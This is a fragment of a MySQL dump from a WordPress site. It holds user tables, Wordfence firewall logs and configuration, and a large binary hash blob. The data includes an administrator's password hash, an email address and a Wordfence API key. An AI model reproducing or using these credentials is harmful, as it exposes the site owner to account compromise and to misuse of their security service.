\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:15:\"wpseo_bulk_edit\";b:1;s:23:\"wf2fa_activate_2fa_self\";b:1;s:25:\"wf2fa_activate_2fa_others\";b:1;s:21:\"wf2fa_manage_settings\";b:1;s:20:\"wpseo_manage_options\";b:1;s:13:\"administrator\";b:1;}s:6:\"filter\";N;s:16:\"\0WP_User\0site_id\";i:1;}s:5:\"nonce\";N;s:8:\"priority\";d:0.8;s:9:\"data_json\";a:0:{}s:13:\"dismissal_key\";N;s:12:\"capabilities\";s:20:\"wpseo_manage_options\";s:16:\"capability_check\";s:3:\"all\";s:14:\"yoast_branding\";b:0;}}}');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_users`
--
DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_login` varchar(60) NOT NULL DEFAULT '',
`user_pass` varchar(255) NOT NULL DEFAULT '',
`user_nicename` varchar(50) NOT NULL DEFAULT '',
`user_email` varchar(100) NOT NULL DEFAULT '',
`user_url` varchar(100) NOT NULL DEFAULT '',
`user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`user_activation_key` varchar(255) NOT NULL DEFAULT '',
`user_status` int(11) NOT NULL DEFAULT 0,
`display_name` varchar(250) NOT NULL DEFAULT '',
PRIMARY KEY (`ID`),
KEY `user_login_key` (`user_login`),
KEY `user_nicename` (`user_nicename`),
KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_users`
--
LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'pp_adsasda111 -','$P$BM9GwcFF5Y8TDUK43X1wluE1N.BbAl0','housing-today','bensykes@bensykes.co.uk','','2016-11-29 14:17:36','',0,'housing-today');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfblockediplog`
--
DROP TABLE IF EXISTS `wp_wfblockediplog`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblockediplog` (
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`countryCode` varchar(2) NOT NULL,
`blockCount` int(10) unsigned NOT NULL DEFAULT 0,
`unixday` int(10) unsigned NOT NULL,
`blockType` varchar(50) NOT NULL DEFAULT 'generic',
PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfblockediplog`
--
LOCK TABLES `wp_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wp_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wp_wfblockediplog` VALUES ('\0\0\0\0\0\0\0\0\0\0��_��','RU',4,18871,'waf'),('\0\0\0\0\0\0\0\0\0\0��)%�','RU',2,18868,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','US',4,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��%\0�','NL',2,18872,'waf'),('\0\0\0\0\0\0\0\0\0\0��%�ƴ','UA',2,18857,'waf'),('\0\0\0\0\0\0\0\0\0\0��%�ƴ','UA',2,18860,'waf'),('\0\0\0\0\0\0\0\0\0\0��-�Sq','US',6,18877,'waf'),('\0\0\0\0\0\0\0\0\0\0��-�$','RU',20,18872,'waf'),('\0\0\0\0\0\0\0\0\0\0��1\"��','IN',27,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0��4���','US',10,18863,'waf'),('\0\0\0\0\0\0\0\0\0\0��SB�A','TR',3,18881,'waf'),('\0\0\0\0\0\0\0\0\0\0��^x�k','TR',4,18881,'waf'),('\0\0\0\0\0\0\0\0\0\0��{9�','CN',2,18859,'waf'),('\0\0\0\0\0\0\0\0\0\0���JL�','FR',2,18883,'waf'),('\0\0\0\0\0\0\0\0\0\0����ǎ','MA',9,18865,'waf'),('\0\0\0\0\0\0\0\0\0\0���Z�s','US',11,18868,'waf'),('\0\0\0\0\0\0\0\0\0\0����a�','NO',1,18857,'waf'),('\0\0\0\0\0\0\0\0\0\0����a�','NO',15,18872,'waf'),('\0\0\0\0\0\0\0\0\0\0����o','FR',6,18860,'waf');
/*!40000 ALTER TABLE `wp_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfblocks7`
--
DROP TABLE IF EXISTS `wp_wfblocks7`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblocks7` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`type` int(10) unsigned NOT NULL DEFAULT 0,
`IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
`blockedTime` bigint(20) NOT NULL,
`reason` varchar(255) NOT NULL,
`lastAttempt` int(10) unsigned DEFAULT 0,
`blockedHits` int(10) unsigned DEFAULT 0,
`expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
`parameters` text DEFAULT NULL,
PRIMARY KEY (`id`),
KEY `type` (`type`),
KEY `IP` (`IP`),
KEY `expiration` (`expiration`)
) ENGINE=InnoDB AUTO_INCREMENT=745 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfblocks7`
--
LOCK TABLES `wp_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wp_wfblocks7` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_wfconfig`
--
DROP TABLE IF EXISTS `wp_wfconfig`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfconfig` (
`name` varchar(100) NOT NULL,
`val` longblob DEFAULT NULL,
`autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_wfconfig`
--
LOCK TABLES `wp_wfconfig` WRITE;
/*!40000 ALTER TABLE `wp_wfconfig` DISABLE KEYS */;
INSERT INTO `wp_wfconfig` VALUES ('actUpdateInterval','2','yes'),('addCacheComment','0','yes'),('adminUserList','a:1:{i:1;i:1;}','yes'),('advancedCommentScanning','1','yes'),('ajaxWatcherDisabled_admin','0','yes'),('ajaxWatcherDisabled_front','0','yes'),('alertEmails','wed@ads.com','yes'),('alertOn_adminLogin','1','yes'),('alertOn_block','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_loginLockout','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_scanIssues','1','yes'),('alertOn_severityLevel','25','yes'),('alertOn_throttle','0','yes'),('alertOn_update','0','yes'),('alertOn_wafDeactivated','1','yes'),('alertOn_wordfenceDeactivated','1','yes'),('alert_maxHourly','0','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),('allowed404s6116Migration','1','yes'),('allowHTTPSCaching','0','yes'),('allowLegacy2FA','0','yes'),('allowMySQLi','1','yes'),('allScansScheduled','a:3:{i:0;a:2:{s:9:\"timestamp\";i:1631656200;s:4:\"args\";a:1:{i:0;i:1631656200;}}i:1;a:2:{s:9:\"timestamp\";i:1631915400;s:4:\"args\";a:1:{i:0;i:1631915400;}}i:2;a:2:{s:9:\"timestamp\";i:1632174600;s:4:\"args\";a:1:{i:0;i:1632174600;}}}','yes'),('apiKey','fed8eafb26485e36858eef84184ff52bf1ed8b8e262bf4675f4ed52cce0e9ef9efdb86f45f314c56349a1cb2ea0357a010f977c823db24d610dee320e55e0f3e0ef2de680a9aaed0bbe70ea5f253c4cc','yes'),('autoBlockScanners','1','yes'),('autoUpdate','1','yes'),('autoUpdateAttempts','0','yes'),('autoUpdateChoice','1','yes'),('bannedURLs','','yes'),('betaThreatDefenseFeed','0','yes'),('blockCustomText','','yes'),('blockedTime','300','yes'),('blocks702Migration','1','yes'),('cacheType','disabled','yes'),('cbl_action','block','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassViewURL','','yes'),('cbl_cookieVal','60d1be984f05e','yes'),('cbl_loggedInBlocked','','yes'),('cbl_redirURL','','yes'),('cbl_restOfSiteBlocked','1','yes'),('checkSpamIP','1','yes'),('config701Migration','1','yes'),('config720Migration','1','yes'),('coreHashes','�\0\0\0\0\0\0\0\Z��a:2:{s:4:\"hash\";s:64:\"c947153e029a74c6d8d1caa85e4aec46022fe0152ffb1dfc23ea508d9e9fe9c4\";s:6:\"hashes\";s:136448:\"\0���W7���ht#� ��q��)��d��$\0��\0(�띰xJ{�h�Ϯ�%��\r^��:��(�5��\0(����Z�Y�Y�@�Iq��ȗ#��T��@\04ߗ�t��\\v�Q���\'_���ajx�Ҧ�\0E=j���ȋ|�p8.�½���֤��SGp�\0Eq�x����Pa���>bv�D��o4V�G;a<��\0^N��弘a�e|K��-��ܰ��ɜ=�\0b�&F�����%|w��*Qr;�|/�=(A���<�\0���#�B�5��j��$#��j!����bN��j�\0�ۧ��4(�K�I|���0��qD.^�v�\0�>|�;(߯\\W*�7?��\n�N��2=�7[Uo\0��i��ք�\"����]�^��XD��2](\0���/��o)��:4]��_���+̔�c���\0�e�*�@�t���\"��q ȐN��5��H�\0�9�w�i����5�������}���h��\0�Z̈�~�0�=��G�#�C��Z}�*��p\0�T|̅_��S�8��O0μ�¸0����6�\0��-bs�G�\n(hr\Z.�n���!e��z.Yx��U�i��5G���$P�u�v�AT����p�l�J��}���a\Z�\0VX=:��8~\"2�ʦD�I�XV�f�EW��e���G�]���q)6�� �j��nNؤ^}0[P�KXs��+ȉa�w�S���[�U`|WS�PD�羟Nh��b!���#�8i�>kq6�R�E�5��:�\"��;B��i.qX��A4����uU��+ױ���ϱ��T�_^gy�zG�L\"1����U}6:��l|��(㜦��q{��V�~u�<�Dh�o*���cϬ0���x�cl$� �4��m����o��`vA:����`{rf��_�S3/s��m�?d�^͔0�X0�#q��-ml�*��#T�c��x�E��y�ũ��H���>��$�2��]�%��*�6�\\�dp�ۛ!��s%��]Z�Y�o�ݿ���������r;G�\"��Gu���&�w]�-H�\rRW��\\�5����\'��=�P�����sZF�ԤoD-x?�<�u���q�XQ�7ai�\rIC�pE�K����y��k�ѩ}ˣ�\\�$�p\"�&�p+^���\Z�{������5�|�f�㵅S�L�o3E�x���ѥU��q�`�q4u���Z����[n�8�O��r7��0H01YL$RRAhJ6��M�w:/�7�.�ڏP���h.B�U-ї�\'Ts��z+p����pHa�P0�4��D�!�2�{�F�|���p8$�h��\"d�3���\\��pY�Q�ᣎ�K4ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V�M�˻yUL���K��C�Wa��\\��ˁ�\n�;�0�Ġ\"f�АΟ��\'\r͍��D�dM������s�ǿ��ڴ�$2�j)�,\n�\' #6�9\n����ږ��mK�2�e�f�te�4���\Z�GG.�f��Vy`��)\".o[`�ϐ�\r�n���jn�viU\n@,�+!%u re4�+JuP$,�WN��P�2�\"Ş�,|^��y���/\Z(A�1]�/ƅ�B�M�j:��@ѫ�G+S�f�����dV�i�\n�6W��ԑ\\<�O�Ej2�Q����\r�|�X6�����/46�J���?���X�GX�~��u���ic\r�p�����Q��활��\r?c�L�Tӊ���qg�ȫ?c�r�ȸ�t�d���B\rTJ�,Q��$�TDh���((Zd�z��vO����_��;ƀ��E�pY�.�&}��_� �Q�������oS�nn�̵v�\0)�������Ӥ�:DILV�\0y�Z��)��K�\n��ܘD�~��%Ro��c��7�\r��L��>1�݈]�^]�RɢNF�M��J�,��i�I.2 ��>1�Z�;ר��1ԁ$�!��W: �Sx�Dq5��/w��_W:��+f�1z��g���\\Y��m�x�GO0���jo].㖽�B�=�f~:N���Fa6�ա�\nY ���\'��i���+�`��fGYbm��UP��M��J�ڡ0�&Cv��M�$����O��4-K� o6�lb�1E�;�7x�?�-�DZ��Z�zE���*�nk���E�m@������1s��Y�#1$��\Z�=I�����b��XBr�?���ͥ-�!�i�>�[��e�V{�W�!F�P�b<&A����8�`��]wB�κ��@kp&���h4ԛ�2����f\'�G���IS��}�}R⥅�JЛZ[`�m��I�$=�����D��֛&�Ǿ@�+բ��qO.���x&��*p���@��l����Β/kz=�i���� S����\Z\Z4ڶ1�5���2�3\r#?E�Q���L��Im$�Z��B\Z�!��&�͖��Ck�`7���\'/��]�i��5�\0�����2SC���+2��f!Og�ve�C�h����%%��-��)^\\���\0�t`�k��@���U�OŔ�cp��>�!8HB6������=�b���!��n�z\0�OS~K��|$��T����lJ�b�Ow������f\nT����Eg\ZU�\r����l{��SYD7I�.`��Ï}#٧���JKN��e�ӌ��&��ЎuѡIq�t���n~T _j��-����%��?�7�0i���}�e�iZ�O�&E+rX�e�{e��mX��<�:�KSy{��r�>K^s�VS2o�H֏�_��)7�����z_oe���ŭy�^/?h;@r�K%��LP��f��c�(|�_]��U�͒o~ME��������s��Rp�d��F[��\'r�5l���蔝媀���s��@Z2]��i���](J~n�3��ϝ�ـ�hj��q�o�2��kL��JQ�c\0�8|V��A�����Nں�)\r�m�MA���D��os,����$���gJ �Ŗ�7l}�a�������w|�gRLh!���1�R�&\'��k�D\':8YިK�Aa�-�RH�T���������(:�=ߤ\'\\�\0���|�8�(��]x�Z���vJ+�~�S�$ً6��vg�Aќ�ʋQ?�j�`J��N�]�0&��b�\0�V?9�����\"�.�I3�2r)rk�+`�NiM��2]<� �h\n�˥���O��3�5F���\\�\0���,vS��+p\n�.����\r�J*RT �!��A&��U�B�tG=_:\\�]>i��?η@ڹ�aKպ�*��Խ+]���ҮgƉ^62�G��\r�S��|�;)�$=X�n!����l=�@�A����:�V56U�x5�Px���&�:V�V��-qX��A9�M�4��-����t\n{���}�MI AE0N������.T0b([���������oYd��%� �+�[�B��� f�<3)|���y-�d�����]`,5��l9�o���x��;����xZ���q@���51a�Ix���MOY�U�\r�Z�t�Kϭ�uJOyŹ�&Ҹ��*�ܲ�us#��t1��#4����䂹\Z��\'&�8�\0������m9;:��ͼ�f��f�)���I�;��Poi���=�DᎯ�0Sl�hsgܺ{�,��)\Z|����<�\n�x��*����i����`��h��`�P��*ͤ�!j1m!�~�J��\r�O�]��Y<�y�}�\Z�>ɺH���I|��P�����Bb��e�^��Έ;VT1��cj�] k^�O��9�A9�/�\Z�%�@b�.�`�� po��df��?�jr��Y��e|�H��h>�,�ec���R�es5-���D=��<��:3��ϩ�M���>���r�6�Ԥ��%z�uۇ7�}�F���[yx��]k��ݭ�Yr����9�IV,C2�\"���V�l��p�]l2�P�f>�Kp��֚J���bvw�`���*�w��}����*ʘ��)>2�q��e��^�)�P����n�GfR�@Ol,>iv�:�`�tQ�*�8\'�<��\n����J���;�H`�Q؝6pq���a�%��\r�� ��\"�A�n�3H�Is�:Y��a�e0BҲy�Pp\nﭾ�����!Λ���&��Ʌ\'M��4�B�S���+\'�4&�$ء��Vgg��o��g~��m/�/&t+���s�����\"#:Z�ܯ4㓉&_&���6\"xF�|w`AZ_+vL\r}��N�P���6������_��Ұ�ݾ��l2�b���qÜ$U�v�� l,s���\"\r�m��`��Yד�U��X^�Ms���6R�H@� &�冾�B�x��@d�R#U��O�Pg��sH�o�)n��Wr��t�Z�M���?%���V���D��Fv�@�����*9V���μ�[E��Bu}<�\Z#�d�4*�?���d�Q]Bx.|9D��:h@��Q��/U\0-|_ۢ1�g-�+����}�Ԙ!^iB���J��\\W�]�f��@@�w�= .]��kZ1љm�G���]�x�0��� 14\"1�Ix��GL�[ ���>(G�A:��� 64���� �2DM�M�$�\r澐i�\0��� 8\\Ŭ�j�A��ʔ5�+X���o�T�m�_| M��yu$�1�ck_�K�o�f��m���%� g)[.�r\n�o�i�{4��Q\n\r8H�\rfX�� v�l���ٮ�!��P��m���\n6|ϔK ~�C�ȫ��7���:��s&u����j��t �+�{R���ل���n�t,�Ǟ�`���|U� � ��#t�̹��p=�I\"����)F ֓���-�\nqU��i���-�$�h*��m�l �Vh���LC��»>U�8.�`�@<K��h �Ϳ��U%�O�Hޡ�@�~x\\6��~�\n<�:�X�h�QAT����o��p2���8>�\n*��<��ӳ�?HM��\'V���L�\'[R�\n�@&��[DqS�������B��N#F�B��\n*An���.]�B��t�v�!�WҧMw�9�F\n+P_tQ�Vo����7n�\nz#�8�����J\nGk��~ng��m.�3\\�\n��1i��jgָ�\nv�?�u� ���f�h6�2B���?�2\03�}�\nx��m���nV=OD��\0T���)��U��\n}.�����v�e�\n�?�.z��E����+ɡ\n��\\_9(�)7�\n��/�S��\'�g߃�v���\n�9d���g��~@���|�B-�����ڐ�6=��\n�T�[Cp����(,�_V+�L\rۨI��(.��\n�s�H��чc �-y//�?�\r�$M̤j3\n�aqYK�JҔp�\ZJ�j��\\P���\n�\n��ڷ�tn�\r�Ean�J;}(��ҙ���.��9\n�X:��Q�}�+�O�\\�_� {�ܓC\'a�y:��\n�� �W\"���w�\05�S Nr������h\n�C��0�pFd���l�\0��\"u�~2\"�T��p\Z\n�v�[\0���XZppi�.��c�;~&���\n���&�)h4�_`�F�L��<��:`#pf���\n����RW#ވ� �Q��ē4E[�\'�z�\r��)��k���O�dS0�X�z���_����61k��K(��]1�z�ukpR�!������YC8���`dfh�.^8����!{��F�N�L{��z�)��,�\"�w�W�S��JDz���K�S����uᾒ�M��cc���cdD�(�Q��\\�\ra�[�J?T���?��G�d��(s������t�BUI+u���C�����R����SF2>�3`��v��\'�:js(��-N���֠����N�3����:�VS;���CT\n��]���C�rJ�2����m5CZ�\0�/@@1�1�D�ծ6��8g\n)e���z��l�1�MH��&��S��.>�U�B|2��ӜOU}��(�tc�2��ĒZV�R�顃[��l#4���>1ε��E���l|lh�����]���:�Yň�3 ����\\gm̻�1)q+#���b�^0rR_Ҳ��Yn,��J�����́�T�NB�(�-��g��\\ICڞ�:r�n�̿�>Tw�D\n�Q�!�@iD��r��ȭ!wz��L{��J�y7-�m���G鴞Y�[����k��En#Xv�i�w�R��:�M�7K�kR��D����.�� L9��%�S���J*����n\'ͪt^���Vɹ�O�����*�(�����7Y��(V��z|%\0\'j����l���ص�$h�TC���՞N�8k�Ⱥ��y�*�<I\n����(���x�$���C\n��m�-B�����YVAlͼ2�VS�#n���X����6��X����DU�T�=��1O�@�,x�������� �)���\r�&�d5�s/,�\"�d��w22���\r��މ#<*Q�f��(�����\r%�P����cW�-:\'2�U�\'Ft�ݩz\r1?�;IB�=S��\Z�2֥͐�&�׆Z�B���\r5C�ٖ��N��s��k��l�\'t35����\rN��I�Y�����ԯ!���6)��I�Y\rQi�^�\ZB|��f��C���-/r��U�Y٢�B\rX�[cdpSs3�%.X��|A���w��#(JL\ra�{p�9����(A�)ˡ�̮SPV��s�6�#i\rnu���:Ft\Z��\"P9���qP���R��PA�\r���k�<vW�P�v��g(Hт��c�+d7\r�Y�t�W^���}rIxۯ�u��$�/dMk�\r�U��:�w����,���&�K�p&�\Z���\r�7Gٛ�r�Xyl�ﳠ<U5p8�n��\r��Xd D\n����q�bc�\Zu��\rٓ��C7,��<��p�,�L��~rY�s#�\r�\"�(qq�6�ZN��������ş&�h��\r�\n���*J��6������V^��%W\\�y�\'�h?I��I��3z(B�GQ#��`p�S:eJ�&�/�ʝ�aɋ��`�\n�}��\Z\\x�+�G\\%R���O��6���}�㕓悫�-�F�kRV��6���G_e\r��\"�}�Q^u�����YtY���sNl�dU|�7��t�U�FY���n�a�IWRH�j�wHBB����u�Xp\0b�Ue�$OrΰYe�JX�p�W !��L� o�Ѧ�?��11����]�Q[��7*�a�3�Ǿ�h��,�U���c�\\�ki����6u��J\n3*��Kv�i��A�&�4���=�D��q!蓸֧f;4��P�Z��e�O!�vx.e��8�jY�����0\Z����P�P1��S/���0�?�U!�͝�������6�??��Z��v�w=2H:�)x.���o\\��J��t�LU��o���L��~��)6�K�5S$ʂ8����⡧5g�g7�3lsuؾ�y���Z�wڠ�0YE\0����身i\\���|�����7��wq��;,r���L�X������\\35qv.Rh<<���t�hD�$��\\1l$y�,��`p�M��j]#�W�B�Tm����F�M�(�b;ˏ�K���g�&\n�-��nzEja �#�[՝YdIdf@\\�K2o��/*�~�Hw�c@�2��,�����P�0������x`Ձ���dZvs�.��k�����\Z�5�\0��yX��$�j뤋��I��8���@t=��{9v��>:̷M\Z�ϵ����\rBt�\r�����3��i��0bn��j:�$L �g��r�a���������t��C �Y�\n��H���$$�T�̞}^�pfO]�ǭN3�%\r\\��-�A�J�K��K���7P�xe�\'�PH���H�P=,���L���N��}�\Z�E�O\\0�u��FOR\Z)ā���;S�\'bN<v�w�LSڻ�sT���|�>Q����i}�G�D���7��OF5�B�Nov���:A�_-3��x\ZJ�B�@k�y50���\n��Q�(��;�4�.���`R��w�|lS�Pp�k�G�M�8�����Թ��f�E�x;˝���O�[����J`uO�v&_���-]����E��;|��x$���(�t`\"���/\Z=�`>&�oR�֫�� �ڲ��}�Z w�%��(�4)�;\r��;�)6qi9C��2��t�d64�Kծ�A�U)۳!���Pdlw�+���>�;��O��-L��hy��ML)\\VH��3_@AJ!�_��drN�d�G��;�Ϸ�6�<���wj�;�V��4dk�Է>�D��j�,p��k~*����d}�[����H�?�iK�[�i��/�(����^��\\���4��c-��Ȝ��)�͗�۷���@c.�V_;q���:uM���X���bW��Z`��E�ض\r�S��ky��%�/�-��u_EC�?o�Tg�NLC\"M�61ɿ�\\�)�j�i����]�m��b�#���6��C2���ao�2ᨁF���ˁL�W���%\rVJ~�p��$���P(��q��\0�RS�;\rs�}��o%��XOwR �\\��B�;z����b#�q���l��E��S�WD��Lex��骴@m!��~���|d�ET9v,�Wы���ʀKK��#\0��f�羀G�~��p��oPq�9��\rbL\\9�2��n�*PP�\0A�w�:oH�RR�ES�G��ʏT-�a*Qf�,S�7��q��̓<�U*\";b�r���^�&��7j�Fő����ұy�ZA\"�Y�!� =��x�`Jߩi.�?w~�/\"w�U{���Lf1:դy;�&ۆ[rD��b�Nv��㤄��\n�\Zwr��kHuE����N�/�JY���g�Si��)�N]o���}�0<��,���eS</�ܓ8C��T2I�UX�jF�\rPJ6�\\�d$Se=g�����JްS�0��il�ww�4�:����\"D�����=[��Z��\r���#�A@�f3�1_<���v����(QN��YCwo����}z�/�+x����\Z8��3�����ۀT�ё/��*�2^�oܰ�\n�0��\0��1�x?F(�8���V����/`8�І���t�2�:�]XK%� EL��償�t�~�nF�^m���KY�N��\"�� �t�hR�D�P�>(�F-�$>Q���A*0l[U[����A7�E�OxƟ�:Y��{�� ��2g�Z��+j{�h���N�.m�۩+�6��r0���q��X�{4�a�����4����=P�Ҟ%^\\$��rf��z�;@h��謬&�f{��2�T��,Jg�~�KOb���H�$�(���\r_�\nt�l� ���6��Ax �70)P;�\01���M{}i����E�ߍ\n�}HNf0/��,u��I������)�-[\0��=ֹ?�+;Q��/W/{����lDA��U��Rp�rmm\rF6��ط��i�(\":�@�c��:�<R)��%+:�����G%Cy*�m?۴�/�\r!����i�AHK2���w:�%.�;j@۴�)H&�R�װ���R��wci�F��z��\r_c;�QA���JR�Q6}���%�\0�w���Q1��h~�B��ʌ���ʤ!�g�y���{�8��٢��7\n��gT1��^0>�\r����劸֬+)��7X[_�u�۱H��]\"���¡`�nr�Xa�;�?~��R��q3��ٽ�R ���a�r\0��B<c�=OR���v�B�n|J��In�;51V��SK��6ǐH��i�I�� (.fO��dx,�0Xl���J�.�*�Js�9��&�$����\rN�Z/�aU�Ə`�d�L�?�>C|����^v�s�_%�W���\rJ���*�f�zK�Hv��M,���,��z��㡫�?jk���[�0}��FW@�U0��W�gS��2c��FF�|�2`85�Sb�G?e?q7����#pjڥ|ɨ\0Y�����O|�aV3E�FW^@l�2�4K��<\\�/#\Z�����jp��!C��B��ڋTL�X�6�j��y�\Z\n�ё�4�W�\\\Z�T���M\\�V�dE��බ|@�]�)2ԕiq�j��\'�Vp�,�����K��zM�r#���6�h��q :�@�߮�\r���0lҞ������6�j����Zm�c����-��k���Y���xJ��5����_�*���]O\\��s�M��\n�T��27���oڠC�g`c���˰m�upa�\\�|/J�y�2�fy2q�t�@W�k�mx�G���V͒����pzk�訍�n!���>x�\\��h|�,�e�0?��s4n�,�Lmu��\Z�^΅hU}1}=�z��i��y\'\'|K��W?[�r(\r�\Z3���z�ػ�fW^P�1Y�2&��ۑpA�U���%�����f��G<�+HH4�ywy�\'hz�x�\"�v�\\�p�$��bo��)cH�vS��n_���(a��WcʹA���`k��BʜѮ,2���S��^ú�D��\Zѣ0?�ޖ�f�t��&�!-�U8��<��Gz�<3\0R�-k�,�u�)���\0��\n�9e\n!I9K�W���Ǽ?_�IaYOrg�Y����k?�R�0��}<�̤����.� ��$^$��m��w`.A�_[�rE��]�J�#��+ߘ�4�D���,E��ǡGf�y5ܟ@��nN�� �36�M���[�y�FRD�m��:�m�\\���,T�3y���?�P����Ԉ+o��Kqra��U�Wj�j�:M���S���C\0����E��pڎ�U=\\ف�2%����72B��9����9k���\r?r��qQe�-�=�������Ozγ�2z!���.�w���\ZFPA���SӃP��l�Z�N���!&��Qw�|�c;\0,2�aڢU��P��rY�o:W�3��\"6�uxh����S�ئ��3)]T�C��ˎ1B��\"$Ϥ_�Y[^�e\n��41��L��Hݩ�̨�<���W`��e��� �U�&�z�տR��B=P�Kq�F�u�~��\Z8�������W�2\0� �e��`h��p�,��-n��}�;F��� \Z/q�@��Q!X�w>����7�.�l�8���le�Q,������� n��a��TߌC�Ӏ#���������6�w�&��f�U�\n��`�Vr�{��YU��\"V1� �]�98}�.�@�\rf[ɖ&����1^����g+fV�`6) �5��E��S�j������r�K����uj��%��p��A������9Xc<_:�l#�(�ǀv)ɣ�,��Ĺ��v�V-�n��z�W��E�2�D�����H�!~\\ꩠF�g�J\Zop\'�]Mi@����P;���VKi��V(�~n��&^VT�Sn���^��E��y �u�\0ci�^Su�%�D�{o�x�\\4\'�1�0p��G&���o����AM�q��5�@�=�� �P�x��N^�+�5H9_r����?�MΩ�Դ�Y��5D`$Bfy�I�S�Wq؛��r�c�W��w\Z��(��&�=\r�eL�|)�a��j.��V��C6���\r��d�\n3[@�\r���܄\'Q�\nŒ�+�N�A���:W������<\'���d����SB�4,��h��ܟ+���{̗r�~a�Aďc��K�Aj�TG��/6���\n�]�<E&@Ƿ�(\0��a�{|�,��@�ha�Z�ݻ�����N/F]\0cOJh�ÙL�C� �8hl�2�\"i\r2ӣ-�X�C +�R�a,��f6���!\\�I&C�#2M�8_6ws�E��U�P�[�Wґ��4L�{4��\Z��U��uw���\'�瞟�h�Q�i���5z\r�&�Ђ`~�\'\r�Q�l;4������e�c1b�0�w�~�{��wcj�|m]a_�����d�����4N��^�\\~��ʘ�����7q/\"]���$��&<Լ �Q��Y�)���\ri\0\"4ߕml��\"W�K�x��I0$\r�!L7����K3@��\"[q���˯v�1 ���K&.��D,��p� ڱ4zή)���F��\r8x���Nz$�wF��m��$\"�������]X����e��\"�?�|2�Y Ō����t�- ����ࣟv�T�ը��2H`o�HPOn�uDpRֽ��R��nO��k2Ω@7 \'y�UٙK;�@I��:7}�.�a� ̑HMϩ: qF�CO������c#�����y\r������<ե�l�4���֬�(�����w �]���5�Fn?�`�b8�)���k�������(S;�w�Aq�^�;�T�ι�[�c��JD_��=$x�B�2냙$5)�S���jrx�V��IR-[�ҟ�1���.;\"��=1�(C]e(�d-|5QC��v��,�?�a�d���kV�l�EW���R*9��)7���m�v�X��bڷ\'�p Z9@��S\r0,t`2�pl��s���W�����)�0�8aIpop�A��B��H�7�M����)�� ��J��Ob�\0�!�X�+c͎������Ǯ�ԑ8�@���G�h��ar6���r�V�B:�\'� 4-����I9��#�\"���iݔ[��-�l���+���\'2Y���U�~nZ����c�t�t�M�h?��Dm�%��ʋd�]��\Z��� 